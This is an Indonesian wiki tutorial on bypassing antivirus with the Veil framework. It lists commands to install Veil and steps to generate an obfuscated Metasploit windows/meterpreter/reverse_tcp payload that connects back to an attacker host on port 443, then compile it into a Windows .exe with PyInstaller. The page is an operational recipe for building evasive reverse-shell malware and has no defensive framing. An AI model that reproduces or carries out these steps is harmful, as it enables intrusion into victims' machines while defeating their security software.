ByPass Antivirus Dengan Veil

From OnnoWiki
Jump to navigation Jump to search

ByPass Antivirus Dengan Veil

Pendahuluan

Payload yang diinject dengan menggunakan Metasploit biasanya terdeteksi oleh antivirus. Kita bisa membypass antivirusnya dengan menyamarkan payloadnya dengan Veil.

Instalasi Veil

   wget https://github.com/ChrisTruncer/Veil/archive/master.zip
   unzip master.zip
   cd Veil-master/setup
   cd ..
   ./setup.sh

Penggunaan

Setelah instalasi, jalankan veilnya ./Veil

Ada 18 payload yang sudah siap digunakan. Untuk melihat daftar payloadnya kita gunakan perintah "use" use

Sebagai contoh kita pilih payload python/b64VirtualAlloc dengan mengetik angka 18 18

Selanjutnya kita ketik perintah "generate" untuk menggenerate payloadnya generate

Setelah itu kita pilih msfvenom dengan mengetik angka "1" 1

Lalu kita berikan detail payloadnya misal Enter metasploit payload: “windows/meterpreter/reverse_tcp“ Enter value for ‘LHOST’, [tab] for local IP: “192.168.0.111" Enter value for ‘LPORT’: “443“

Setelah payload digenerate kita beri nama payloadnya misalkan "bypass"

Kita akan gunakan Pyinstaller untuk membuat file .exe. Ketik "1"

Hasilnya payload akan disimpan di /root/Veil-master/output/compiled/

Pranala Menarik